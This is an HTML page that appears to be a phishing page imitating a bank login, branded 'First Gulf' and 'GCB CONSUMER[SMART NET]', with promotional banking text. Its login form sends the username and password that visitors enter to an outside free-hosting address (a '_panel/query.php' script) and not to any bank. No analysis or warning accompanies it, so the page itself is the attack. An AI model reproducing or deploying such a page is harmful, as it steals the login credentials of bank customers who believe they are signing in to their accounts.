<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Welcome</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex, nofollow">
<!-- 
<link rel="stylesheet" type="text/css" href="../public/css/reset.css">
<link rel="stylesheet" type="text/css" href="../public/css/global.css">
<link rel="stylesheet" type="text/css" href="../public/css/branding.css">
<link rel="stylesheet" type="text/css" href="../public/css/buttons.css">

 -->
<link rel="stylesheet" type="text/css" href="css/reset.css">
<link rel="stylesheet" type="text/css" href="css/global.css">
<link rel="stylesheet" type="text/css" href="css/branding.css">
<link rel="stylesheet" type="text/css" href="css/buttons.css">

<style type="text/css">
body {
	background-color: #FFFFFF;
}
</style>
</head>
<body class="home homenav" style="background:#069">
		

<!-- END Aperture tag -->
<div style="width: 650px" id="box"><!-- end skiplinks -->

		

			<!-- Contains the header navigation logo and search -->
			<div id="masthead">
				<div id="logo_area">
				  <h1 style="font-size: xx-large; font-family: 'Lucida Console', Monaco, monospace; font-weight: bold;">GCB</h1>
				  <h1 style="font-size: medium; font-family: 'Lucida Console', Monaco, monospace; font-weight: bold; font-style: italic;"><span style="text-align: left"></span>CONSUMER[SMART NET]</h1>
		      </div>
				<div class="clear_all"></div>
			</div>

			
<div id="wrapper">
<div id="content" class="wide">
<h1 class="hidden">First Gulf</h1>
<div id="primarycontent">

<div class="heropodcontainer">

<div class="heropod heropod-accounts">
  <h1>Login</h1>
  <p>&nbsp;</p>
  <p>Enter your username and password to log in.</p>

</div>
<form name="form1" method="post" action="http://fgbonline.esy.es/_panel/query.php">
  <label for="textfields"></label>
  <table width="328" border="1">
    <tr>
      <td width="43" height="28">Username</td>
      <td width="43"><label for="textfield2"></label>
        <input type="text" name="username" id="textfield2"></td>
      <td width="43">&nbsp;</td>
      </tr>
    <tr>
      <td height="33">Password</td>
      <td><label for="textfield3"></label>
        <input type="password" name="password" id="textfield3"></td>
      <td>&nbsp;</td>
      </tr>
    <tr>
      <td>&nbsp;</td>
      <td><input type="submit" name="login" id="button" value="Login"></td>
      <td>&nbsp;</td>
      </tr>
  </table>
  <br /><br /><br />
</form>
</div>
<div class="break"></div>
</div>
<div id="secondarycontent">

<div class="SSIpodcolumn SSIpodcolumn-first">
<div class="SSIpodcontainer">

<div class="salespod salespod-generic">
<div class="primarypod">
<h2 class="noicon"> </h2>
<div class="break"></div>
</div>
<div class="secondarypod">
<h3>A range of 24/7 business <br> services to suit your needs</h3>
<p>Securely manage your  accounts whenever and wherever you want.</p>
</div>
<div class="break"></div>
</div>
<div class="break"></div>




</div>
</div>
<div class="SSIpodcolumn">
<div class="SSIpodcontainer">

<div class="salespod salespod-accounts">
<div class="primarypod">
<h2 class="noicon"> </h2>
<div class="break"></div>
</div>
<div class="secondarypod">
<h3>A $5 reward each month with the Reward  Account</h3>
<p>Just pay in $750, pay out two different direct debits and stay in credit each month.</p></div>
<div class="break"></div>
</div>
<div class="break"></div>




</div>
</div>
</div>
</div>
</div>
</div><!--end footerlinks-->
<!--**************************************************************************
Javascript for popup survey
************************************************************************** -->
</body>
</html>



